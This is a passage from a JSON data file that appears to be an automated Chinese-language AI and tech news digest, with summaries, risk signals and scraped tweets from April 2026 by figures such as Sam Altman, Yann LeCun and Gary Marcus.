"Claude上线Blender MCP连接器", + "url": "https://x.com/Pluvio9yte/status/2049403423813140571", + "handle": "Pluvio9yte", + "date": "2026-04-29" + }, + { + "text": "Claude打通创意工具链", + "url": "https://x.com/berryxia/status/2049247904536428805", + "handle": "berryxia", + "date": "2026-04-28" + } + ] + }, + { + "id": "t3", + "title": "开源生态的冷数据:67,196个Agent项目分析", + "subtitle": "Jason Zhu跑通全网Agent工具库,揭示极度不均衡的分布", + "priority": "P1", + "bullets": [ + "基尼系数0.983破纪录,54.1%项目0 star,Top1%占83% stars", + "2026年3月单月新增27,720个项目,是2024年月均的45倍", + "Matt Pocock开源Skill框架:16个工程师级实战技能,38K stars" + ], + "samples": [ + { + "text": "67,196个Agent项目分析", + "url": "https://x.com/GoSailGlobal/status/2049415194372342164", + "handle": "GoSailGlobal", + "date": "2026-04-29" + }, + { + "text": "Matt Pocock Skills 38K stars", + "url": "https://x.com/GoSailGlobal/status/2049339826877665496", + "handle": "GoSailGlobal", + "date": "2026-04-29" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "OpenAI全系正式登陆AWS", + "meta": "2026-04-29 | 来自@GoSailGlobal", + "summary": "GPT + Codex + 托管Agent一并上线AWS,企业级AI服务再下一城", + "url": "https://x.com//status/2049327989951967546" + }, + { + "id": "p02", + "title": "Nvidia发布Nemotron 3 Nano Omni", + "meta": "2026-04-28 | 来自@berryxia", + "summary": "30B参数多模态开源模型,256K上下文,专为subagents设计,完全开源", + "url": "https://x.com//status/2049253021159403786" + }, + { + "id": "p05", + "title": "美联储维持利率3.50-3.75%", + "meta": "2026-04-28 | 来自@charliebilello", + "summary": "伊朗战争影响经济和通胀预期,利率决策观望", + "url": "https://x.com//status/2049214106352107778" + }, + { + "id": "p06", + "title": "Perplexity全面切换GPT-5.5", + "meta": "2026-04-24 | 来自@AravSrinivas", + "summary": "GPT-5.5作为默认orchestrator模型,性能和成本优化", + "url": "https://x.com//status/2047753276888854595" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "feels like a good time to seriously rethink how operating systems and user interfaces are designed", + "speaker": "Sam Altman", + "date": "2026-04-26", + "note": "对OS和UI设计的反思,暗示AI将改变人机交互范式", + "url": "https://x.com/Sam Altman/status/2048428561481265539" + }, + { + "id": "q2", + "quote": "Warp 不只是个终端,定位是 ADE(Agentic Development Environment)", + "speaker": "泊舟", + "date": "2026-04-29", + "note": "Warp开源定位解读,AGPL防白嫖", + "url": "https://x.com/泊舟/status/2049436870963085429" + }, + { + "id": "q3", + "quote": "The real issue is culture and talent quality, and fixing that usually requires a full rebuild", + "speaker": "Harry Stebbings", + "date": "2026-04-29", + "note": "关于AI时代团队重建的洞见,裁员不能解决文化问题", + "url": "https://x.com/Harry Stebbings/status/2049298621951058341" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "开源工具爆发", + "subtitle": "Warp开源+Matt Pocock Skills+Poolside Laguna", + "level": "P0", + "items": [ + { + "text": "Matt Pocock Skills 38K stars", + "url": "https://github.com/mattpocock/skills" + }, + { + "text": "前GitHub CTO团队Poolside开源Laguna", + "url": "https://x.com//status/2049250710492160228" + } + ] + }, + { + "id": "c2", + "title": "AI编程工具更新", + "subtitle": "Cursor 3.2 + Claude Code + Codex", + "level": "P0", + "items": [] + }, + { + "id": "c3", + "title": "3D/创意工作流", + "subtitle": "Claude Blender MCP + SATO网格生成", + "level": "P1", + "items": [ + { + "text": "SATO: 3D网格生成重磅突破", + "url": "https://x.com//status/2049255217603178794" + } + ] + }, + { + "id": "c4", + "title": "大模型进展", + "subtitle": "Nvidia Nemotron + MiniCPM-o 4.5", + "level": "P1", + "items": [ + { + "text": "MiniCPM-o 4.5: 边缘AI突破", + "url": "https://x.com//status/2049274065610027362" + } + ] + }, + { + "id": "c5", + "title": "宏观与能源", + "subtitle": "伊朗战争对能源价格的影响", + "level": "P1", + "items": [ + { + "text": "Jet Fuel +70%, 原油+48-52%, 化肥+23%", + "url": "https://x.com//status/2049298490489004357" + } + ] + }, + { + "id": "c6", + "title": "华语圈热点", + "subtitle": "小米送token、联通查PCDN", + "level": "P2", + "items": [ + { + "text": "小米百万亿token补贴", + "url": "https://x.com//status/2049296454905393361" + }, + { + "text": "长沙联通上门查PCDN", + "url": "https://x.com//status/2049408651660755063" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "Claude Code系统提示Bug", + "detail": "托管Agent失效+用户token被空转烧光,使用Claude Code需留意", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "r2", + "level": "MID", + "title": "Anthropic与军方合作分歧", + "detail": "Anthropic拒接军方合作,Google签下五角大楼合同,AI厂商在政府合同上分化,可能影响未来市场格局", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "r3", + "level": "OPP", + "title": "AI安全争议持续", + "detail": "Gary Marcus持续质疑AI公司,OpenAI庭审中Musk与Altman矛盾公开化", + "url": "https://x.com/GaryMarcus/status/2049243406380237116" + }, + { + "id": "r4", + "level": "MID", + "title": "美股估值与退出困境", + "detail": "Harry Stebbings警示 VC支持的科技创新公司 IPO门槛高(需5亿收入),退出选项有限", + "url": "https://x.com/HarryStebbings/status/2049237538901020767" + }, + { + "id": "r5", + "level": "WARN", + "title": "美国房价增速放缓", + "detail": "全美房价同比仅增0.7%(2023年6月以来最慢),卖家数量创纪录 比买家多46%,若无政府干预价格将下行", + "url": "https://x.com/charliebilello/status/2049306480071873011" + }, + { + "id": "r6", + "level": "MID", + "title": "开源bot的护城河危机", + "detail": "Leo:AI时代护城河从\"代码会写\"变成\"策略会想\",以前两个月重写架构变成两小时", + "url": "https://x.com/runes_leo/status/2049311708330459226" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-29T10:59:43.472886+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 44 | **成功获取**: 37 | **推文总数**: 513\n\n---\n\n### ✅ @karpathy — Andrej Karpathy(2 条)\n\n**[2026-04-27T21:34:34+00:00]**\n> RT by @karpathy: New work with @AlecRad and @DavidDuvenaud: Have you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. Vintage models sh…\n[原文链接](https://x.com/karpathy/status/2048878495539843211)\n\n**[2026-04-22T16:00:05+00:00]**\n> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built…\n[原文链接](https://x.com/karpathy/status/2046982383430496444)\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-29T02:31:21+00:00]**\n> R to @sama: at this point @ajambrosino is mogmogging enjoy the next few updates\n[原文链接](https://x.com/sama/status/2049315574120055054)\n\n**[2026-04-29T02:27:13+00:00]**\n> Image\n[原文链接](https://x.com/sama/status/2049314532892475791)\n\n**[2026-04-28T21:37:05+00:00]**\n> Image\n[原文链接](https://x.com/sama/status/2049241518540808440)\n\n**[2026-04-28T21:12:19+00:00]**\n> wow y'all love 5.5 we should think of something nice to do to celebrate!\n[原文链接](https://x.com/sama/status/2049235284655780000)\n\n**[2026-04-28T05:28:43+00:00]**\n> RT by @sama: Don't just reset Codex rate limits for fun, it costs money. Don't just reset Codex rate limits for fun, it costs money. ... but the vibes are good ... I have reset Codex rate limits for …\n[原文链接](https://x.com/sama/status/2048997818673537399)\n\n**[2026-04-28T02:52:46+00:00]**\n> RT by @sama: We will ship again this week. Codex has achieved escape velocity and will keep improving rapidly.\n[原文链接](https://x.com/sama/status/2048958572562710550)\n\n**[2026-04-27T23:55:12+00:00]**\n> codex with the $20 plan is a really good deal\n[原文链接](https://x.com/sama/status/2048913887614115857)\n\n**[2026-04-27T23:42:41+00:00]**\n> we love our users\n[原文链接](https://x.com/sama/status/2048910739784826966)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://x.com/sama/status/2048755148361707946)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://x.com/sama/status/2048751392031203544)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://x.com/sama/status/2048554097985593849)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://x.com/sama/status/2048552677433643427)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://x.com/sama/status/2048428561481265539)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://x.com/sama/status/2048426122854228141)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://x.com/sama/status/2048224374264885396)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://x.com/sama/status/2048165186482389253)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://x.com/sama/status/2048160448340767038)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://x.com/sama/status/2048160404376105179)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://x.com/sama/status/2048062261584077149)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://x.com/sama/status/2047823357635354814)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(9 条)\n\n**[2026-04-28T16:05:11+00:00]**\n> RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad. Comet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet al…\n[原文链接](https://x.com/AravSrinivas/status/2049157990604025896)\n\n**[2026-04-28T15:38:49+00:00]**\n> R to @AravSrinivas: reddit.com/r/GeminiAI/commen…\n[原文链接](https://x.com/AravSrinivas/status/2049151356985040934)\n\n**[2026-04-28T15:38:28+00:00]**\n> A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.\n[原文链接](https://x.com/AravSrinivas/status/2049151268606894310)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://x.com/AravSrinivas/status/2047788775468908840)\n\n**[2026-04-24T19:03:21+00:00]**\n> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y…\n[原文链接](https://x.com/AravSrinivas/status/2047753276888854595)\n\n**[2026-04-24T18:44:19+00:00]**\n> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047748486767272243)\n\n**[2026-04-23T02:46:57+00:00]**\n> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047145172337836139)\n\n**[2026-04-22T18:28:20+00:00]**\n> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c…\n[原文链接](https://x.com/AravSrinivas/status/2047019688920756504)\n\n**[2026-04-22T18:15:16+00:00]**\n> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an…\n[原文链接](https://x.com/AravSrinivas/status/2047016400292839808)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(1 条)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://x.com/AndrewYNg/status/2048793852702757151)\n\n---\n\n### ✅ @cursor_ai — Cursor(8 条)\n\n**[2026-04-24T19:48:34+00:00]**\n> R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download\n[原文链接](https://x.com/cursor_ai/status/2047764656165646786)\n\n**[2026-04-24T19:48:33+00:00]**\n> R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes. A single agent session can now target a reusable workspace made of multiple folders.\n[原文链接](https://x.com/cursor_ai/status/2047764654760632725)\n\n**[2026-04-24T19:48:33+00:00]**\n> R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window. Run isolated tasks in the background across different branches. When you're ready to test cha…\n[原文链接](https://x.com/cursor_ai/status/2047764652977958938)\n\n**[2026-04-24T19:48:33+00:00]**\n> Introducing /multitask in the new Cursor 3 interface. Cursor can now run async subagents to parallelize your requests instead of adding them to the queue. For already queued messages, you can ask Cur…\n[原文链接](https://x.com/cursor_ai/status/2047764651363180839)\n\n**[2026-04-24T18:28:47+00:00]**\n> R to @cursor_ai: More on CursorBench: http://cursor.com/blog/cursorbench\n[原文链接](https://x.com/cursor_ai/status/2047744580280561948)\n\n**[2026-04-24T18:28:47+00:00]**\n> GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%. We've partnered with OpenAI to offer it for 50% off through May 2.\n[原文链接](https://x.com/cursor_ai/status/2047744579127185843)\n\n**[2026-04-22T17:12:09+00:00]**\n> R to @cursor_ai: Add Cursor to Slack: http://cursor.com/api/install-slack-app\n[原文链接](https://x.com/cursor_ai/status/2047000519043141766)\n\n**[2026-04-22T17:12:09+00:00]**\n> Mention @​Cursor to kick off tasks in Slack and see updates of its work streaming in real time. Cursor uses context in the thread and broader channels to create a PR for you to review and ship.\n[原文链接](https://x.com/cursor_ai/status/2047000517751288303)\n\n---\n\n### ✅ @ylecun — Yann LeCun(20 条)\n\n**[2026-04-28T21:36:28+00:00]**\n> RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 ! As my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers: - EB-JEPA https://github…\n[原文链接](https://x.com/ylecun/status/2049241361266684288)\n\n**[2026-04-28T01:05:42+00:00]**\n> RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc In just one year, it has be…\n[原文链接](https://x.com/ylecun/status/2048931628995510596)\n\n**[2026-04-27T21:38:46+00:00]**\n> RT by @ylecun: “Calling Trump a fascist incites political violence” Here’s a compilation of Trump calling his opponents fascists\n[原文链接](https://x.com/ylecun/status/2048879552022130882)\n\n**[2026-04-27T21:06:29+00:00]**\n> RT by @ylecun: He is right\n[原文链接](https://x.com/ylecun/status/2048871429681148028)\n\n**[2026-04-27T14:59:33+00:00]**\n> RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 ye…\n[原文链接](https://x.com/ylecun/status/2048779086168838610)\n\n**[2026-04-27T12:27:04+00:00]**\n> RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the ne…\n[原文链接](https://x.com/ylecun/status/2048740712556933170)\n\n**[2026-04-27T10:23:22+00:00]**\n> RT by @ylecun: AI has had one safest technology roll-outs in history. Read that again, because it's a fact. It's used by billions with a tiny fraction of a percent of actual problems. And yet it's se…\n[原文链接](https://x.com/ylecun/status/2048709585360367651)\n\n**[2026-04-27T06:49:24+00:00]**\n> RT by @ylecun: Image\n[原文链接](https://x.com/ylecun/status/2048655735412650355)\n\n**[2026-04-26T23:40:02+00:00]**\n> RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor au…\n[原文链接](https://x.com/ylecun/status/2048547683112046771)\n\n**[2026-04-26T19:19:22+00:00]**\n> RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. The result, predictably, is…\n[原文链接](https://x.com/ylecun/status/2048482084646240560)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://x.com/ylecun/status/2048469956627468510)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://x.com/ylecun/status/2048453901930660058)\n\n**[2026-04-26T16:08:11+00:00]**\n> RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? Hell no, right? But the answer is actuall…\n[原文链接](https://x.com/ylecun/status/2048433973177573559)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://x.com/ylecun/status/2048432684930654430)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://x.com/ylecun/status/2048399621492236615)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://x.com/ylecun/status/2048293118781296734)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://x.com/ylecun/status/2048118689258487857)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://x.com/ylecun/status/2048069805807128734)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://x.com/ylecun/status/2047680485208531152)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://x.com/ylecun/status/2047676640059154653)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(9 条)\n\n**[2026-04-28T20:16:21+00:00]**\n> Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below. Translate is one of my favorite Google products because it brings us all closer together! I've been involved wi…\n[原文链接](https://x.com/JeffDean/status/2049221200321380805)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://x.com/JeffDean/status/2048759102390899142)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://x.com/JeffDean/status/2048351736037826877)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://x.com/JeffDean/status/2047665074471387456)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://x.com/JeffDean/status/2047408945950802186)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://x.com/JeffDean/status/2047407537566495033)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://x.com/JeffDean/status/2047405389856297387)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://x.com/JeffDean/status/2047403921912873257)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://x.com/JeffDean/status/2047339995682529313)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(3 条)\n\n**[2026-04-28T13:25:24+00:00]**\n> Test of Time LLM from some legends...pretty fun!\n[原文链接](https://x.com/soumithchintala/status/2049117783447785523)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://x.com/soumithchintala/status/2048756358820827564)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://x.com/soumithchintala/status/2047191747793649805)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(16 条)\n\n**[2026-04-29T04:57:00+00:00]**\n> OpenAI may no longer be a nonprofit but it continues to be—and may always be—a “never made a profit”\n[原文链接](https://x.com/GaryMarcus/status/2049352224547975422)\n\n**[2026-04-29T03:10:50+00:00]**\n> RT by @GaryMarcus: Gary, that was a great article. Wonderful work as always sir. You have been proven accurate once again.\n[原文链接](https://x.com/GaryMarcus/status/2049325506764677608)\n\n**[2026-04-29T02:53:39+00:00]**\n> the ability of this man to sell things he doesn’t believe in is truly extraordinary\n[原文链接](https://x.com/GaryMarcus/status/2049321182089081059)\n\n**[2026-04-28T21:46:18+00:00]**\n> Wow. Musk’s lawyers will capitalize on this.\n[原文链接](https://x.com/GaryMarcus/status/2049243836359254025)\n\n**[2026-04-28T21:44:35+00:00]**\n> From what I can tell, Elon Musk just stepped on his own toes at the trial, making it all about him instead of the promises Altman and Brockman broke. OpenAI will slay his ego on cross. He should have…\n[原文链接](https://x.com/GaryMarcus/status/2049243406380237116)\n\n**[2026-04-28T21:06:51+00:00]**\n> RT by @GaryMarcus: As an avid cyclist, I was amused to see ChatGPT's “powerful new image engine\" draw a bicycle with the \"brake\" label pointing to empty space where brakes are sometimes found on othe…\n[原文链接](https://x.com/GaryMarcus/status/2049233910266278250)\n\n**[2026-04-28T19:01:24+00:00]**\n> Thoughtful book on LLMs and linguistics — by someone who actually knows linguistics.\n[原文链接](https://x.com/GaryMarcus/status/2049202338209079574)\n\n**[2026-04-28T17:00:41+00:00]**\n> Google, 2001: Don’t Be Evil Google, 2026: How much does mass surveillance pay?\n[原文链接](https://x.com/GaryMarcus/status/2049171957250207936)\n\n**[2026-04-28T16:37:04+00:00]**\n> RT by @GaryMarcus: They were saying that AI was going to enable time travel, and quite frankly, it truly did! It transported us all straight to 1984.\n[原文链接](https://x.com/GaryMarcus/status/2049166017138692254)\n\n**[2026-04-28T16:17:18+00:00]**\n> honestly, one of the worst things this nation has ever done to itself.\n[原文链接](https://x.com/GaryMarcus/status/2049161039665848492)\n\n**[2026-04-28T15:57:57+00:00]**\n> Talking AI with @MarioNawfal momentarily (9am PT; link info will be at his pinned tweet, or view on YouTube).\n[原文链接](https://x.com/GaryMarcus/status/2049156171463110746)\n\n**[2026-04-28T15:48:20+00:00]**\n> RT by @GaryMarcus: I spent the last 2 months trying to prevent this. If OpenAI offered a fig leaf, Google said \"imagine we offered a fig leaf.\" Google affirms it can't veto usage, commits to modify s…\n[原文链接](https://x.com/GaryMarcus/status/2049153749743264231)\n\n**[2026-04-28T12:31:48+00:00]**\n> ⚠️ Google’s Pentagon deal seems to allow for autonomous weapons and mass surveillance. ⚠️\n[原文链接](https://x.com/GaryMarcus/status/2049104294415409347)\n\n**[2026-04-28T06:25:14+00:00]**\n> RT by @GaryMarcus: The cracks inside OpenAI are deepening, and the numbers don’t lie. When your own CFO is sounding the alarm, something is seriously wrong. Check this out: 1: OpenAI missed its targe…\n[原文链接](https://x.com/GaryMarcus/status/2049012041164185701)\n\n**[2026-04-28T04:31:45+00:00]**\n> OpenAI, which squandered its tremendous lead and is now missing its projections, is in trouble. There’s no two ways about it.\n[原文链接](https://x.com/GaryMarcus/status/2048983482685440365)\n\n**[2026-04-28T04:05:40+00:00]**\n> When you project exponential growth – and miss. I stand by my call that OpenAI is likely to someday be seen as the WeWork of AI.\n[原文链接](https://x.com/GaryMarcus/status/2048976920629645554)\n\n---\n\n### ✅ @elonmusk — Elon Musk(20 条)\n\n**[2026-04-29T06:19:31+00:00]**\n> Cybertruck\n[原文链接](https://x.com/elonmusk/status/2049372990870290940)\n\n**[2026-04-29T06:05:35+00:00]**\n> Congrats!\n[原文链接](https://x.com/elonmusk/status/2049369485459832951)\n\n**[2026-04-29T06:04:42+00:00]**\n> RT by @elonmusk: Full circle moment: paying for @Starlink with @XMoney 🤝\n[原文链接](https://x.com/elonmusk/status/2049369264914903143)\n\n**[2026-04-29T05:57:10+00:00]**\n> RT by @elonmusk: Elon Musk on AI during the OpenAI trial: \"It (AI) could make us more prosperous, but it could also kill us all. We want to be in a Gene Roddenberry movie, like Star Trek, not so much…\n[原文链接](https://x.com/elonmusk/status/2049367366824305013)\n\n**[2026-04-29T03:37:16+00:00]**\n> RT by @elonmusk: The exact same question to Grok 4.3, GPT 5.5, and Claude Opus 4.7: “Count to 10 starting from 11” Grok 4.3 wins 🏆 Every single time It gave 11, 10 and explained why going backwards w…\n[原文链接](https://x.com/elonmusk/status/2049332159601942995)\n\n**[2026-04-29T01:55:58+00:00]**\n> RT by @elonmusk: #BREAKING: Chairman @Jim_Jordan invites Southern Poverty Law Center Interim CEO and President Bryan Fair to testify publicly on Wednesday, May 20, 2026, at 10:00 a.m.\n[原文链接](https://x.com/elonmusk/status/2049306669352358192)\n\n**[2026-04-29T01:16:51+00:00]**\n> RT by @elonmusk: Following future rollout of FSD V14 Lite for HW3 vehicles in the US, we plan on expanding V14 Lite to additional international markets. This update ensures that HW3 vehicle owners wi…\n[原文链接](https://x.com/elonmusk/status/2049296822162874685)\n\n**[2026-04-29T00:23:52+00:00]**\n> RT by @elonmusk: Ookla says @Starlink has been a game-changer for inflight Wi-Fi speeds. Their new report ranks which airline has the fastest Wi-Fi: \"Starlink stood out for its speed. Of over 50 airl…\n[原文链接](https://x.com/elonmusk/status/2049283488600277368)\n\n**[2026-04-29T00:09:36+00:00]**\n> RT by @elonmusk: Super high bandwidth to commercial aircraft with @Starlink\n[原文链接](https://x.com/elonmusk/status/2049279898976702535)\n\n**[2026-04-28T22:48:24+00:00]**\n> RT by @elonmusk: The California Coastal Commission has issued a formal apology to @elonmusk and SpaceX, adding that it will not consider political views or speech in future regulatory decisions. • Th…\n[原文链接](https://x.com/elonmusk/status/2049259466973933764)\n\n**[2026-04-28T15:39:42+00:00]**\n> RT by @elonmusk: Integrating Starlink with @TMobile’s 5G network will provide reliable, high-speed broadband for millions of businesses, including those in rural and remote locations across the count…\n[原文链接](https://x.com/elonmusk/status/2049151577597112419)\n\n**[2026-04-28T15:36:44+00:00]**\n> RT by @elonmusk: Actually Smart Summon now reacts a lot faster\n[原文链接](https://x.com/elonmusk/status/2049150833422647689)\n\n**[2026-04-28T06:20:07+00:00]**\n> 💯\n[原文链接](https://x.com/elonmusk/status/2049010754012209457)\n\n**[2026-04-28T05:08:03+00:00]**\n> RT by @elonmusk: To those who pit Sam Altman and Elon Musk against each other like a billionaire feud, look, do your own research. When have you ever seen Elon Musk use his money to buy a yacht, a pa…\n[原文链接](https://x.com/elonmusk/status/2048992619926106526)\n\n**[2026-04-28T04:39:42+00:00]**\n> RT by @elonmusk: South Korean reporter after experiencing @Tesla FSD (Supervised) in the country for the first time: \"It flawlessly performed all tasks, including obeying traffic signals, staying in …\n[原文链接](https://x.com/elonmusk/status/2048985482709676382)\n\n**[2026-04-28T04:20:02+00:00]**\n> RT by @elonmusk: Let me get this straight: > the top 1% earners in CA pay a cumulative $40-$50b/yr in income tax > yet CA Medicaid alone loses $50b/yr in fraud So, you can work your whole life to be …\n[原文链接](https://x.com/elonmusk/status/2048980534370410757)\n\n**[2026-04-28T03:28:16+00:00]**\n> RT by @elonmusk: 🇺🇸 Another deranged liberal openly disappointed Trump wasn’t assassinated. These people are actually upset he survived. What the hell is wrong with them?\n[原文链接](https://x.com/elonmusk/status/2048967507432681518)\n\n**[2026-04-28T01:03:02+00:00]**\n> RT 